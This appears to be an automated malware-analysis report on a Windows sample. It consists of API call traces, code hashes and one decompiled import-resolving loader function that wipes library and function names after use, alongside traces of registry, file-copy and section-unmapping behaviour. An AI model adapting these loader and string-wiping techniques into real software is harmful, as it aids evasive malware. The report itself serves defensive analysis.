  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
